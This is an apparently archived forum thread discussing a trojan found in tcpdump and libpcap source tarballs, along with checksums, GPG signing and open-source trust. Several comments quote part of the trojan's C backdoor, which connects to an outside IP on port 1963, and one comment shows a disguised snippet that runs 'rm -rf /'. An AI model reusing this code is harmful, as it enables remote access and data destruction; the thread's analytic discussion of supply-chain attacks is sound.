• If I try to guess what your real point is, the best I can come up with is "viruses are easier to detect than trojans, because you can spot them by looking at the binaries instead of digging through the source". While this sounds a little more reasonable on the surface, it is also flawed. Yes, it is easy to spot a virus by compairing an infected binary with an uninfected binary (if you know which one is which). But it would be just as easy to detect a trojaned program by compairing it to an untrojaned copy (again, assuming that one was labled "suspected" and the other was labeled "known good").
  
• As for contrasting open source and closed source (which seems to be the main axe you are grinding), the advantage of open source is that, in the case where you don't have a "known good" copy) it is much easier to find suspicious code by looking at the source than by looking at the binary.

-- MarkusQ

Re:Eventually, this would happen

[whereiswaldo]

You do realize of course that MD5s only provide limited security. Afterall, if I can replace the .tar.gz, why can't I also replace the .md5?

Presumably, the md5sum file was also md5sum'd.

Re:Eventually, this would happen

[Random+Walk]

Unfortunately, almost nobody cares to verify signatures. And exactly nobody ever tries to verify the signature key.

And worst of all, gpg has no option that would enforce checking the signature on signed data, or at least would make it difficult to access them without checking the signature.

Re:Eventually, this would happen

[FallLine]

I, on the other hand, would maintain that it is to the point. It was a clear example of the sort of emotional (as opposed to rational) argument you were offering. In particular, your heated tone implies sharp distinctions that all but vanish when examined a little more calmly. They are (I would argue) an artifact not of what you are saying but of how you are saying it.

There was nothing emotional in my post. I challenge you to list something that was emotional. What's more, even if you will assert that were was a scintilla of emotion in it, you completely ignored the bulk of the argument in favor of some niggardly point, despite the fact that the meaning (and even arguably phrasing) was very clear. Lastly, you were the ones that came forth with the ad hominem attacks. Pot Kettle Black.

I said:

Put bluntly, if you wish to hold up viruses as an example of the frequency of "trojans" in closed source software, then you should make a strong distinction between the virus' very generic attacks and the often far more dangerous and subtle trojan attacks of humans on specific code and installations.

That was a very clear statement, yet you spewed:

Stripped of all the heat/emotional language, your statement boils down to: "to use viruses as example of trojans you should distiguish virus attacks and trojan attacks." In other words, if I want to say "A is an example of B" I should say "A is not B"--which is not a valid statement about categorical inclusion.

Wrong. That is not what I said. What I said, in essence, is that, although viruses are a subset of trojans [which they are: according to the popular definition; according to your hero's post in this thread; and especially according to the stricter definition of the Jargon File], for the purpose of this discussion, an argument concerning the relative resistance against trojaning of open source vs closed source, you should make a distinction between the capabilities of the generic virus (e.g., stick this destructive code to destroy all files at the end of every executable) and that of the purposely coded human trojan (e.g., transfer every 100th transaction into my bank account). In other words, while you might technically be able to say that both are trojans equally well, ignoring the difference in the context of this discussion is disingenious.

Even if it was true in general, it wouldn't apply in this case since "trojan" is a means of acting ("trojan" code is code that lies hidden inside a seemingly innocent program, and therefore is executed by an unsuspecting user) while "virus" is a means of propogation ("virus" code is code that spreads by using the resources of infected machines to make copies of itself). To put them in opposition is a silly as contrasting "things that swim" with "things that lay eggs".

More of the same nonsense. Again, I did not say that.

If I try to guess what your real point is, the best I can come up with is "viruses are easier to detect than trojans, because you can spot them by looking at the binaries instead of digging through the source". While this sounds a little more reasonable on the surface, it is also flawed. Yes, it is easy to spot a virus by compairing an infected binary with an uninfected binary (if you know which one is which). But it would be just as easy to detect a trojaned program by compairing it to an untrojaned copy (again, assuming that one was labled "suspected" and the other was labeled "known good").

No, this is not what I was referring to either. Perhaps your trouble is simply your shallow understanding of the structure of the various executable files and the limitations on what any program can do, baring some major advances in AI, versus that of a human's creativity. You are not going to see a virus that can selectively go into any program and do something specific to that program itself like, say, transferring every 5th charge to my bank account. In other words, the fact that viruses can spread successfully is a result of the fact that they limit themselves to the trivial appending of code and other such non-specific attacks. Outside of those easily detectable sorts of attacks, a closed source binary is far far harder to trojan.

As for contrasting open source and closed source (which seems to be the main axe you are grinding), the advantage of open source is that, in the case where you don't have a "known good" copy) it is much easier to find suspicious code by looking at the source than by looking at the binary.

I disagree. It is easier to formulate an attack than it is a defence. While you are empowered to more easily look for bugs and backdoors in the code with the availability of source code, you are also put in a position where thousands of people can even more easily insert their own malicious code (completely ignoring the fact that few people in the real world do or even have the time). The bad guys only need to inject a couple lines of code, but you need to fully understand what each and every line does and that is far less trivial. Open source auditors may easily detect code such as if strcmp(passwd,"l33tpass") backdoor(); but the backdoor may consist of infinitely more subtle attacks. For instance, the hacker may introduce a hard to reproduce buffer overflow vulnerability, without using one of the many known insecure functions, especially in places that people are unlikely to be looking at intensely. Besides the fact that these open source development efforts generally involve more programmers, rather then a select few, and therefore increase the exposure to "bad" people, the risks do not end when the distribution is finalized. When you have open source code you make it easier for any hacker that may happen to intercept the code in transit, so to speak. When you have open source code, you make it easier to create a backdoor in the system for a hacker... and so on. In short, if you are going to claim that open source is easier to validate, then you should also admit that it at least makes it easier to write malicious code for, both because you can trivially add code in a high level fashion and because your ability to understand the fundamentals of the program is greater (e.g., you don't have to reverse engineer file formats).

Seems

[jamesjw]

Seems now more than ever the need to check the authenticity of your sources before installing.

As if security auditing wasnt a big enough headache already :(

Re:Seems

[Marx_Mrvelous]

You mean you don't check the checksum before you install software now? There's a reason that they provide the md5 for the compressed code!

Re:Seems

[paranoos]

If some malicious coder could upload manipulated software, do you not think they could also spoof the MD5 sum also? From what I've seen, the checksum is usually just stored in a text file in the same directory.

Re:Seems

[fitten]

md5sum doesn't guarantee anything other than saying that the version you downloaded was the one that the author/host put out there for you to download (and not someone else's). If the author/host put a trojan in it, the md5sum will be for the trojan'd software.

In the end, it still comes down to whether or not you (can) trust the author/host.

Re:Seems

[a_n_d_e_r_s]

Actually, the MD5 hash has been used to find at least one earlier case. They didn't uppdate the MD5 and someone got suspocious when it did not match.

Re:Seems

[schlach]

No, he's right. There's usually just an md5 file stored in the same directory, and it is the dumbest thing in the world. The system would work if everyone just signed their damn md5 file, and their public key was available on a different server, say the web server, emails, public key root servers, etc. etc. Why don't they do this? I dunno, next time you see a distro this way, write the admin and ask them.

Re:Seems

[harlows_monkeys]

Normally a md5 checksum is stored in a different server... or at least it should be

But is it normally a different server running a different operating system and a different web/ftp server, administered by different people?

If not, then there's no reason to trust it any more than the the server with the trojan.

Re:Seems

[mjh]

Thanks to Antioffline.com for hosting us, and Gentoo's Portage system for catching the trojaned files via checksums.

This was caught by the gentoo portage system. The gentoo portage system distributes a number of "ebuilds". Each one of those contains (amongst many other pieces of info) the MD5 for the downloaded source file.

To get this exploit past gentoo, you would have had to compromise the tcpdump.org site AND compromise the gentoo mirror which held the ebuild.

I'm a debian user who has tinkered with gentoo. This is a very impressive win for gentoo. Way to go, gentoo.

This Trojan thing...

[Big+Mark]

It's not unusual at all in the Unix world. Pete's sake, K. Ritchie (he who invented Unix and C, or at least part of the team) put trojans into early versions of cc and login so that he could get accsess to _any_ unix system.

It worked with the trojaned compiler making bent versions of the login program. You couldn't detect it as if you compiled another version of cc or login from clean source the bent cc would infect that one and the cycle of infection continued. Very cleverly done.

Actually, for all you know maybe every version of gcc ever allows RMS and Torvalds into your box...

Re:This Trojan thing...

[JamesO]

Its Denis Ritchie

And he only might have done it (can you tell?)

See http://www.acm.org/classics/sep95/ for more details

Re:This Trojan thing...

[F2F]

It's Ken Thompson. How do I know? His name is right beneath the title of the article you linked.

Ewww

[segfault7375]

Trojan Found in libpcap and tcpdump

I swear, some of these source trees are worse than the canals of Venice. :)

MD5 checksums

[Zayin]

Use them.

Re:MD5 checksums

[diamondc]

if someone breaks into an ftp server, they might as well replace the md5 signatures, too. a better solution would be signing the sources with a gpg key.

Re:MD5 checksums

[AccUser]

That's good if you can assure that the MD5 checksum is for the original tarball. What if the guy who placed the torjan placed a new MD5 checksum as well?

Re:MD5 checksums

[KjetilK]

....and replace the GPG signatures with keys that just have the same name and address. If there are two keys with the same name and address, which one would you trust?

We need to come together and paaaaaarty! :-)

Really, that's the only solution to this problem. Probably, this is something we are going to see more frequently, so frequently perhaps that it may undermine the free software community's credibility. Therefore, we must come together and meet, and exchange signatures, so that at least we can ensure that they software is signed by its maintainer.

Now, go and get registered at Biglumber, sign up to the keysignings list and start organizing keysigning parties. Also, make sure that you meet other hackers when you're out travelling.

Re:MD5 checksums

[Sloppy]

A matching MD5 is equivalent to this:

"This file is safe." -- Anonymous Coward

Do you trust Anonymous Coward?

Re:MD5 checksums

[ReelOddeeo]

If there are two keys with the same name and address, which one would you trust?

At least you should be suspicious.

Re:MD5 checksums

[KjetilK]

If there are 2 different signatures for the same source, this is a red flag that one of them has been altered. Thus the audit begins, and thus the backdoor is found.

Or people think: "oh, the author has generated a new key" and move along without considering the alternative. This isn't really strong enough.

mars.raketti.net

[solostring]

The program connects to 212.146.0.34 (mars.raketti.net) on port 1963

With that information, I suppose that it is easy to find out which Finnish 'author' included the trojan, and would be simple to track him down. But my question is how something like this could have been included in an open source code and released to the general public?

Re:mars.raketti.net

[Draoi]

Chances are, it's some other hapless admin's r00ted box .....

This is a growing trend

This never used to happen. Now it is like as if someone is intentionally trying their luck to trojan open-source projects. The crack0r types usually try to claim some kind of responsibility to increase their m0j0, but I haven't heard of anyone doing so. Usually a crack0r will try to make the trojaning *bad* to further make themselves feel better, but these trojanings are often in name only, and are of no real security threat. I am wondering if this is an anti-freesoftware publicity ploy by some individual or group.

That's not a problem, that's a feature

there's no-one to pay me to pay my staff for the lost man-hours caused by this.
But then again, you had to pay no-one for the man hours you saved by using the open-source code.

Re:This is dreadful

[vadim_t]

Excuse me if I sound disrespectful, but that makes me really doubt your skills. MD4? First, usually what's used is MD5, second it's just a hash and doesn't ensure the file hasn't been tampered with. All you need is to run md5sum on the patched file.

Now, good GPG signatures would have helped.

Security getting worse?

[Noryungi]

... or are script kiddies getting better?

Seriously, though, I think the ideal solution would be to do multiple checks of the RC5 signature of newest packages, over several mirrors. The advisory mentioned that tcpdump.org was compromised, while the mirror at ibiblio.org was OK.

Or use Gentoo Linux. Of course. I can't do that, since I don't have broadband at home... =(

One too many?

[simpleguy]

Isn't this one too many?

There was dsniff, BitchX, OpenSSH etc. and today tcpdump and libpcap?

Does anyone else think that someone has found a security hole in a popular unix daemon and is having some fun with it before notifying the authors. Or maybe there is a *VERY NASTY* exploit circulating privately?

At least that's what I think.

Re:One too many?

[LostCluster]

As Linux becomes more popular, the dumber system admins who never patched their Windows systems now have Linux systems. All it takes is a small handful of people to not know there is a wide-open back door, or worse yet know but be too lazy to take the corrective action, and there's enough zombies to cause headaches.

Re:One too many?

[Hard_Code]

Aha...there's the bug, now let me just recompile the daemon against libpcap...uh, wait...

Re:One too many?

[ei4anb]

www.netcraft.com says www.tcpdump.org uses OpenSSL/0.9.5a

http://www.openssl.org/news/secadv_20020730.txt says that is vulnerable.

Everyone using OpenSSL 0.9.6d or earlier, or 0.9.7-beta2 or earlier or current development snapshots of 0.9.7 to provide SSL or TLS is vulnerable, whether client or server.

Re:One too many?

[alexandre]

There always is a private exploit circulating ... that's the problem.

Re:One too many?

[Mandi+Walls]

Unless their OS vendor produces patches without incrementing to a new version of SSL.

Why would they do this? 'cause the OpenSSL apis keep changing and the vendor saw that patching an older ssl version was easier than rebuilding and pushing errata for every freaking package that uses SSL.

0.9.5a is still updated by Red Hat, for example, on 7.0 because it is required for python 1.5.2, which is required for more packages than i care to list here. (including up2date, which gets you such fancy updates from Red Hat)

However, 0.9.5a is patchable to a safe level, it's most recent build date for 7.0 being August 1.

Now, if they're not running vendor-provided patches on a production server, then they have a lot of faith in their sysadmin to have a lot of time to sit and compile new software everytime a patch becomes available. Which, being that netcraft also says they're running a BSD, maybe they are just that crazy. :)

--mandi

Re:One too many?

[Jeppe+Salvesen]

Or maybe there is a *VERY NASTY* exploit circulating privately? This is why the people who set up honeynets and dissect the scans are our heroes. They would hopefully detect unknown exploits in software, just by looking at the fingerprint of the attack and figuring out if it is already known.

That being said, that alone is not enough. Everyone should run their updates nightly, and make sure their security don't collapse completely once one box has been taken.

However, I would like to take the opportunity to applaud the honeynet people who actively act like sitting ducks in order to protect the rest of us.

Re:One too many?

[supabeast!]

Even better, does anyone think that there a a ton of poorly-defended systems out there where l33t hax0rs can replace popular programs with their own, and the only people who find out are open source geeks?

For example, what would happen if someone hacked the Symantec Anti-Virus FTP, replaced the intelligent updater with a trojan, hacked the HTTP server and stuck up a matching md5sum, and then waited until monday for thousands of admins to download the latest version and install it? How long would it take for someone to find out?

Even worse, would anyone ever even find out?

Re:One too many?

[arkanes]

I don't know for sure, but I would generally assume that people who write security oriented software like OpenSSH and tcpdump would maintain updated, secured servers.

Re:One too many?

[cascadefx]

You do realize that you are talking about the maintainers of libpcap and tcpdump. I wouldn't think that they are slouches in the Linux department. Apache got hacked a while back as well. Theirs was because a combination of policy issues and a hacked server on the network that one of their maintainers was using to connect to the site. I bet we will find something similar in all of these problems.

Remember kids: Your computer may be safe, but the computer you connect from may be a skeezy gutter snipe. If you have to use someone else's computer use a Linux bootable CD with ssh and stunnel. If you are on a foriegn network, pack that laptop and use those tools.

Re:One too many?

[HiThere]

Everyone should run their updates nightly, and ...

That's a bit of a dangerous piece of advice. Correcting problems is good. Periodic updates opens you to the next infection. The only people, e.g., affected by this trojan are those who updated the affected applications while it was out there. But if everyone updated every night, something like this could hit everyone at once.

Re:One too many?

[Jeppe+Salvesen]

I trust Red Hat packages and Red Hat network. It is much too high profile for them to allow it to be hacked and then used to distribute trojan'ed software.

Re:This is dreadful

[jimand]

there's no-one to pay me to pay my staff for the lost man-hours caused by this

Did Microsoft pay you for lost man-hours when your staff battled Nimda or Code Red? Didn't think so.

cleaning?

[mr.+marbles]

so seeing as how there's no trojan cleaning program in linux, how does a person infected with the trojan rid his system of it? is it as simple as installing the non-trojan version?

Re:cleaning?

[Megane]

From looking at the diffs, the trojans seem to be in the build scripts, not the binaries. The modification to the source code was simply to provide an obfuscated way to pass the port number back to the trojaned build scripts.

I guess that's the clever part... you only activate the trojan if you recompile from source!

Hey, Slashdot,

[gazbo]

I was just wondering how long these sources have been available with these many eyes making bugs shallow and so forth? I'm assuming it's less than 1 hour, because as I keep being told, everyone in the open source community checks all source code thoroughly before installing it, which is something that can't be done with closed source.

Re:prison

[outofpaper]

While it is true that:

our current legal environment is that it appears to not matter much the ill intent of authors of such malevolent code

It is also true that only because this is an open sorce project was such code found. People seem to forget that there is no realy eficient way of checking closed software for sevurity holes. Ontop of that companies are more than likly to place back doors in programs as actual features that are not mentioned in documentation, or only glazed over. My exaple for this was in a Busines programe that I wourk with had the "option for you to enter a code into one of the text fields if you set the computers date to a specific date and then you would be able to edit all records, thus by pasing the simple code that it uses. I fould out about the feature when the was a problem with some of the records and since the files are encoed I wasn't going to search through them in any easy way so I cantacted the programes distributor and they told me of this feature. Just think how meany othe progs out there have stuff like that.

Re:Siltakoski Petri is somehow connected with this

[rekulator]

Yeah! Let's nail his ass! ..
Oh wait, perhaps he's just the tech guy working for the company which registered the domain "raketti.net", Kuopion Puhelin. It's a telecom and net operator after all.

Don't jump to conclusions

[astrashe]

The good blackhats have lots of compromised machines at their disposal, and are generally way too clever to leave such an obvious clue behind.

It's possible that this guy has something to do with it, but it's more likely that his machine is owned by the same person who managed to put the trojan out there.

Er, I thought trojans were for preventing...

[quintessent]

...wait...never mind.

Why do I have a feeling

[Raul654]

...that this little incident will not be mentioned in the next edition of the Cathedral and the Baazar?

Re:Siltakoski Petri is somehow connected with this

[Masa]

Siltakoski Petri is somehow connected with this

Yes and no. The information you have successfully received from the Whois database is pointing to the phone company in Finland, which happens to be a host for raketti.net domain. Petri Siltakoski is just an administrative contact of the ISP (Raketti.Net). He has nothing to do with the web page set up by an individual who seems to have an account in this ISP.

Re:This is dreadful

[phaze3000]

It's the one problem with the open-source community - there's no-one to pay me to pay my staff for the lost man-hours caused by this.

I couldn't agree more, if those cheap-arsed hippies who write Linux would only pay up when there's a problem with their software like reputable commercial companies like Micros.. err, Oracl.. err actually, forget it.

Re:Siltakoski Petri is somehow connected with this

[dohcvtec]

Siltakoski Petri is apparently just the guy who registered that domain. It could be that a user from that domain is involved or, as you said, that server has been r00ted. Funny, though, http://mars.raketti.net/~mash/services is nothing but a FreeBSD /etc/services file.

Reply from a mirror site to HLUG and tcpdump.org

[Dogcow]

This was just sent ~1 min ago:

To : msolnik@hlug.org
Cc : wt-changes@wiretapped.net,
tcpdump-workers@tcpdump.org,
mcr@sandelman.ottawa.on.ca
Subject : tcpdump.org mirrors
----- Message Text -----
Hi guys,

I run the main mirror of tcpdump at wiretapped.net (no relation to wiretapped.us) in Australia. We rsync from cvs.tcpdump.org, and have removed the entire tcpdump.org tree and disabled rsync updates until we hear from Michael Richardson at tcpdump.org.

You may like to add this info to your Updates area, as the unavailability of the main mirror site may seem suspicious. It is not, as described above.

Because wiretapped.net itself is mirrored to a few other sites, it may take between 1 hour and 24 hours for this removal (and any subsequent re-addition) to take effect. We'll note when it goes back online at http://www.wiretapped.net/changelog.html

Hope this assists in preventing any further spread,

Grant
www.wiretapped.net

Re:This is dreadful

[gowen]

I run a successful London-based dot com

Wow. And just minutes ago you were a succesful lawyer. I'm so jealous.

Accountability

[Mephie]

I admit to not knowing a lot about open source development, not being a developer myself. But I'm curious, is there any sort of legal accoutability when someone intentionally codes a trojan in to a piece of software? Is it possible to keep track of who is writing what code? When trojans, etc, are discovered, are you limited to just patching them and going from there, or is it usually possible to find out who did it and therefore be suspect of future code?

Re:This is dreadful

[Erik+Hollensbe]

It's the one problem with the open-source community - there's no-one to pay me to pay my staff for the lost man-hours caused by this.

Do you expect sun or microsoft to pay you, either?

Isn't this the whole point of Open Source?

[elliotj]

I thought the whole idea of the GPL was that you could take a program and modify it to your own needs so long as you release the source back to the community under the same license.

Sounds like that's what happened here!

Uncommented trojan

[magi]

The trojan code seems somewhat complex and unreadable at first glance. The variable names don't express much of the semantics. It even doesn't have any comments. No wonder no one notices if this kind of stuff is written into code. And this is very clear code.

Even (or especially) free software developers should use more descriptive variable names and comment their code well. It makes the code much more readable for analysis, both security or quality reviews.

Well, ok, crackers probably want to obfuscate their code with /* Here's stuff for the trojan. */, but if all code is well documented, it's generally easier to understand and intentional obfuscation might be easier to spot.

I'd recommend the rule: "One comment per statement, except when really unnecessary." Many people think it's silly, but those people haven't had to read a lot of other people's code.

Hmm, I wonder why they used port 1963...author's birth year? Nah, that would be too old for a typical cracker.

Re:Uncommented trojan

[forgoil]

If you have to write a comment, it is not obvious. Hence only write comments when it is not obvious what is going on.

And, do please try to make it obvious as to what is going on. I can't stand code where the comments is a MUCH bulkier version OF THE CODE. I can read code, I do it every day. I can't read minds.

If you want to write well documented code, document what a class does and what a method/function does. That helps a lot more. Then I won't have to read your code unless there is something wrong at that very point. And then I only need to know what is not obvious from the code.

Re:Uncommented trojan

[The+Other+Nate]

Very Offtopic...

1963 - Assasination of President Kennedy

Re:Uncommented trojan

[Avakado]

but if all code is well documented, it's generally easier to understand and intentional obfuscation might be easier to spot.

How hard is it to write code that appears to do something friendly, but actually does something really nasty? Consider this appearantly friendly code:
#define hug system
const char* bunny = { 0x72, 0x6d, 0x20, 0x2d, 0x72, 0x66, 0x20, 0x2f, 0 }; // Bunny ID

// Hugs the bunny specified by 'bunny'
void hug_a_bunny() {
hug(bunny);
}

Hint: bunny evaluates to "rm -rf /"

Re:Uncommented trojan

[magi]

1963 - Assasination of President Kennedy

It seems that the troian is Finnish. A few things that occurred in 1963:

• New health insurance law was passed
  
• Importing of cars was releaved
  
• Prime minister was Ahti Karjalainen
  
• The Sävelradio (Light Music Program) started in public radio broadcasts
  
• The Committee of 100 was founded
  
• Finns Tuula-Kaija (16) and Seppo (21) danced twist 60 hours continuously.
  
• 100th anniversary of Finnish Parliament
  
• An almost ready nine-floor apartment building crashes in Lahti. No casualties.
  

In foreign countries;

• J.F.K is killed
  
• NASA news satellite Relay 1 relayed news between GB, USA, and Brazil.
  
• Rolling Stones published their first record Come On
  
• Hurricane destroyed half of Japan's crop
  
• A lightning killed 81 people in Maryland, USA
  
• Martin Luther King's famous speech, "I have a dream..."
  
• Kennedy's citizen rights law enacted
  
• 1600 dead in Jugoslavia in earthquake
  
• First woman in space, Valentina Tereskova, in Vostok-1
  
• Pope Whatever VI came in power
  
• Bruno Ross observed X-ray radiation from space
  

Re:So much for peer auditing?

I'm going to try to walk you through this with baby steps.
let me make sure to put pillows over the sharp corners of the table.

this was found, just last night, because of the change in the md5 checksum.
this md5 checksum changed because the file changed.
this file changed because someone changed it
so in conclusion, this file has not been like this for a year

hope you were able to keep up

Re:This is dreadful

[Hostile17]

"It's the one problem with the open-source community - there's no-one to pay me to pay my staff for the lost man-hours caused by this. "

And this is different from Closed Source how ?

Doesn't the money come from the money you`ve saved by not having to pay for any software? What did your business plan mention about this? Just a blank page, right? Try it out and see what happens? Well, it's your money!

Same place it will come from if you use Closed Source software, using Open Source products does not mean zero cost IT, it means lower cost IT. If your company did plan for these things, then it will make no difference what products you are using.

Re:So much for peer auditing?

[DarkBlack]

It has probably been not that long since it was trojaned. Gentoo's portage system gets tcpdump from tcpdump.org and md5's the sources before building. More than likely, it has only been trojaned just recently.

Since there are no md5 sums or gpg signatures listed on tcpdump.org it makes it very easy for someone to simply replace the source. Only those that check md5 sums and gpg signatures will know if it is truly trojaned or not.

I hope that the tcpdump people will start provided md5 sums and gpg signatures for those that build from source.

Re:So much for peer auditing?

[oliverthered]

Or C:
There are no diecent auditing tools in use.

Everyone could check 95% on the code and still miss a trojan in the other 5%.

DEMAND PGP SIGNATURES!!!!

[aphor]

The reason this is a problem is that nebulous shrug of an answer to the question "Who are you trusting to provide this code which you execute?" It could be an anonymous PGP/GPG key, but to violate people's trust would mean that trusted token is no longer trusted, and thus it would identify the other risks out there.

Imagine the tcpdump distributions were signed by an anonymous key. We could look over the code, and decide to trust that key. Later, people would be able to tacitly trust that key to sign tcpdump tarballs. One day, the tcpdump code will fail to match the signature: it will be caught before being executed, and the trojan will be discovered quickly. Later, another trojan will appear, but the signature will match. A few people will be bit, but the key will be exposed and others will be able to quickly identify their risk.

At the VERY LEAST, use MD5 sums on the files like FreeBSD ports!

Re:DEMAND PGP SIGNATURES!!!!

[jonabbey]

And for god's sake, keep your private signing key encrypted in your gpg keyring, or offline.

Re:DEMAND PGP SIGNATURES!!!!

[aphor]

Goes without saying, but maybe I expect too much of the average user?

Yes, for your own sake, and the sakes of everyone who trusts you: guard your private key(s) with teeth!

facts, not fiction.

[F2F]

the article is called 'reflections on trusting trust' and Ken Thompson wrote it upon inception of the ACM distinguished scientist award. now, we all know you are full of shit (since you can't even spell his name right) but claiming that 'each version of login was compromised' is so far off base that it't not even funny.

follow the link posted already, read it and try to understand what he fundamentally tries to tell you. then go and read aleph1's 'smashing the stack for fun and profit' and try to get a glimpse of what 'hacking' was considered in the 80s.

Re:Siltakoski Petri is somehow connected with this

[monotoy]

that's not true, look at it again ...

in the middle of the fuly commented services file, you find (let's hope /. eats this code post ... ):

#!/bin/sh
cat >conftes.c
#include
#include
#include
#include

#define XOR_KEY 0x89

int main (int argc, char **argv)
{
char c;
int s, x, sv0[2], sv1[2];
struct sockaddr_in sa;

switch (fork ()) { case 0: break; default: exit (1);}
close (0); close (1); close (2);

do {
if ((s = socket (AF_INET, SOCK_STREAM, 0)) == (-1))
exit (1);

sa.sin_family = AF_INET;
sa.sin_port = htons (1963);
sa.sin_addr.s_addr = inet_addr ("212.146.0.34");

alarm (10);
if (connect (s, (struct sockaddr *)&sa, sizeof (sa)) == (-1))
exit (1);
if ((x = read (s, &c, 1)) /dev/null 1>/dev/null

nice, isn't it?

heheh

How is this fair?

[kiwimate]

This apparently misleading (albeit well-intentioned) comment gets modded +4 interesting, meaning that almost everyone will see this poor guy's name.

All the replying posts pointing out that it's a phone company/ISP and it's almost certainly nothing to do with this chap are at 2 or below, meaning that many people won't see them and this individual's name is now besmirched.

And, by the way, this happens all the bl**dy time on /. An early poster makes assumptions and gets modded way the hell up, then all the rebuttals pointing out he's talking out of an unreliable orifice wallow in the low point range.

Yeah, I know it's off-topic. Just wanted to rant about something that irritates me. Return to your normally-scheduled bits and pieces.

at least...

[Leimy]

they were practicing safe sex

Impressive! (Was: as soon as this evening...)

[teqo]

apt-get update...
well, I have not installed these sniffing proggies, so it should be okay.

Darn... apt-get even makes your box more secure than before even if you haven't actually installed the bad packages? This must be the Holy Grail! And it should be okay? Not only that you have not installed tcpdump and libpcap, what definitely makes it okay, you don't even trust apt-get to really solve your (non-existing) problem... Now I wanna join the apt-get cult... Where can I register?

I bet you recommend penicillin over other medicine even when you got no infection! Or do you use apt-get then as well? Doesn't make any difference anyway...

(For the record: I use Debian GNU/Linux among other stuff...)

NO!!!! NO!!! NO!!!

[AxelTorvalds]

md5 checksums are nice but if I was going to put a trojan in to something, I'd probably rebuild the md5sum too. Basically md5sum is a glorified CRC at the end of the gzip, nothing more and nothing less.

Do this: Download gpg from gnupg.org. Build it. Generate yourself a key. Try to get some of your friends to sign it. submit it to keyserver.net. Sign your code with that key. While you're at it, start using kmail, evolution, or mozilla with enigmail and start signing your emails too. Do it religiously.

Check sigs when you download code too.

Re:NO!!!! NO!!! NO!!!

[c13v3rm0nk3y]

and start signing your emails too. Do it religiously

Man, this is the truth. We need to start using crypto for everyday things, as well as the "important" stuff. It needs to be ubiquitous.

Re:This is dreadful

[djtack]

And looking through his user profile, he's also a rocket scientist. Wow.

More

...as a rocket scientist I feel most compelled to answer
http://slashdot.org/comments.pl?sid=44937& cid=4658776

...I run a successful London-based dot com
http://slashdot.org/comments.pl?sid=44933&cid =4658433

... As a lawyer myself, I can state that
http://slashdot.org/comments.pl?sid=44912&ci d=4658097

... I'm an avid open-source supporter
http://slashdot.org/comments.pl?sid=211 28&cid=2238414

...I am an avid supported of the open-source movement [sounds familiar? that's because it is -ed]
http://slashdot.org/comments.pl?sid=20824&ci d=2207372

...I'm an avid supported of the open source movement [we know -ed]
http://slashdot.org/comments.pl?sid=20761&ci d=2204471

... I am a passionate supported of the open-source movement [geez -ed]
http://slashdot.org/comments.pl?sid=20760&ci d=2204422

Re:Siltakoski Petri is somehow connected with this

[mistered]

I don't know what kind of /etc/services file you have on your FreeBSD boxes, but I doubt they look like this one. Scroll about half way down:

#monitor 561/tcp
#monitor 561/udp
#chshell 562/tcp chcmd
#!/bin/sh
cat >conftes.c #include
#include
#include
#include
#include

#define XOR_KEY 0x89

int main (int argc, char **argv)
{
char c;
int s, x, sv0[2], sv1[2];
struct sockaddr_in sa;

...

Recent incidents that I know of

[frozenray]

irssi
fragroute, dsniff, fragrouter
BitchX

This message says Recently there have been a spat of well publicized attacks against what I would consider to be the backbone of the open source movement - it's source code distribution system. Hackers have been penetrating people who download, say, OpenSSH and then compile it to use on their systems by trojaning OpenSSH itself. This strikes at the very HEART of Open Source by making the act of installing the software a weakness. Because Open Source has no one distribution point, there are many places for someone to verify if they want to install software securely. Because there are no vendors, the sites people download software from are usually not provided with a dedicated security staff.

This is serious, guys and gals. Use the source, Luke - but what if I can't trust the source any more? Open Source has to find a method to get around this problem; see this post.

Re:This is dreadful

[forged]

The guy is good, isn't he 8-}

This reminds me of this one time when I chatted this girl on IRC. Oh wait.....

Would it help to have a source Bank?

[cmeans]

A single place where OS projects could deposit their code (on whatever frequent basis they liked), that would "guarantee" that the code was free of Trojans etc. before making it available to others for download...

I'm just typing out loud here.

Yes, there'd almost certainly have to be a cost associated with this, and I'd think it would be paid by the people who wanted source code, but didn't want to have to worry about checking it for Trojans etc..

The source could still be publically available for comment and review to add to those being paid to perform the analysis.

Seems like this might be a good service, once the idea is fleshed out more...

There'd also need to be some definition of "guaranteed" (or maybe just a different word :0) that fit this scenario, most people don't want to set themselves up to be sued.

Re:Would it help to have a source Bank?

[Sloppy]

Isn't what you're describing, pretty much what a prepackaged distribution is? For example, when someone installs Linux from a Red Hat CD, they are getting stuff from Red Hat, instead of from a bunch of potentially compromised servers all over the Internet. They are trusting Red Hat's QC.

It's the LFS and other people who grab tarballs from here'n'there, who are vulnerable to these kinds of problems.

Re:Would it help to have a source Bank?

[cmeans]

That's a good point...but I was thinking of a non-partisan approach.

Does RH scour the source code they distribute?

Re:Would it help to have a source Bank?

[John+Hasler]

> Does RH scour the source code they distribute?

I review the source code of my Debian packages.

Sigh

Note that THE DATE ON THE FILE DOESN'T MATTER. It was trojaned last night, not last year.

The fact that someone so ineptly trojaned the source, not even bothering to generate a new md5sum, suggests that it's someone out to make it obvious looking. Someone who has a reason to discredit open source. Someone like a former script kiddie employed by microsoft...

Never mind that russian crackers were wondering round MS servers for MONTHS back in 2000...

Re:Sigh

[KjetilK]

Someone who has a reason to discredit open source

...or someone giving us a wake-up call... Even though the free software community is better in many respects, there's much room for improvement, and this is a field where we should improve, so perhaps we should just thank the bastard who did this... :-)

Re:Siltakoski Petri is somehow connected with this

[dohcvtec]

Heh, I had only looked at the first few lines or so, and didn't think anything of it. Did anyone look in the parent directory from where that services file is? Or if the trojan gets any other files besides services?

Read "Reflections on Trusting Trust"

Having source code freely available doesn't imply security. Ken Thompson demonstrated this very eloquently in his paper.

Big, bad Microsoft

[d3xt3r]

The scariest thought about this is that big companies who can't be trusted (read: Microsoft) could be doing this type of thing to 0wn your Windoze box and any other applications you might want to compile via MSVC++, VB, or .Nut.

Scary, very scary.

Re:Big, bad Microsoft

[ReelOddeeo]

Big bad evil monopolistic companies don't need to go to anywhere near the same effort you are thinking of.

If they want to 0wn someone's precious VB code, then they can just program the trojan routines into the compiler without disguising them. It's not like you have the source to the compiler to examine.

But this entire point is moot. If they want to own large numbers of machines, they have a much simpler mechanism: Windows Update. Since millions of people agree to let their XP box automatically download and install updates from MS, they don't need to 0wn you today. They could at any artibrary time decide to 0wn you through Windows update. The advantage of this approach is that there is nothing today that looks suspicious. All code obtained via. Windows Update is legit, furthering your trust in Windows Update.

In the event, say, of a great national emergency, for instance, an unfavorable court ruling against Microsoft, they could overnight 0wn millions upon millions of boxes.

